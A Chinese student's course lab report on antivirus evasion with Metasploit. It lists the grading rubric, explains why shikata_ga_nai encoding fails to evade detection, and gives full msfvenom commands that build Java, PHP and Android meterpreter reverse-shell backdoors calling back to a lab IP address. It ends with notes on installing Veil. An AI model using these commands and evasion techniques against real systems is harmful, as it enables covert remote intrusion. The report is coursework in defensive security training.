20175122邱昕网络对抗技术exp3《免杀原理与实践》

1. 实践内容（4分）

1.1 方法（3分）

- 正确使用msf编码器（0.5分），

- msfvenom生成如jar之类的其他文件（0.5分），

- veil（0.5分），

- 加壳工具（0.5分），

- 使用C + shellcode编程（0.5分），

- 使用其他课堂未介绍方法（0.5分）

1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)

（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

1.正确使用msf编码器

使用VirusTotal或Virscan这两个网站对实验二中生成的后门程序5122backdoor.exe扫描

用msf编码器对后门程序1次编码，用VirusTotal或Virscan这两个网站检测

10次编码

可见多次编码对于免杀没有太大的帮助

因为shikata_ga_nai总会有解码（decoder stub）部分需要加入的exe中，杀软只要找到了这一部分，就能查出这是恶意代码。而且msfvenom总以固定的模版来生成exe文件。它所有生成的exe文件，如果使用默认参数或者模版，也有一定的固定特征，所以一般来说AV厂商会针对msf使用的模板生成特征码

侦测，这样就能解决所有msfvenom生成的恶意代码了。

2.msfvenom生成如jar之类的其他文件

使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.81.130 LPORT=5122 x > java5122backdoor.jar生成java后门

生成php后门程序 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.81.130 LPORT=5122 x > php5122backdoor.php

生成apk文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.81.130 LPORT=5122 x > apk5122backdoor.apk

3.veil的安装及生成后门程序

关于veil和wine的安装道阻且长，由于过于坎坷没有截图，可参考同学们的博客，云班课中的讨论，csdn中的资料等等，反正各种方法我都试了，克隆是最慢的，wine是最常出错的，最后我也没明白自己怎么成功了，提一句，在克隆的时候把防火墙3600打开会快一点，原理不明。总的来说这一步应该是最麻烦的，无论哪个同学这一步都是出错最多的地方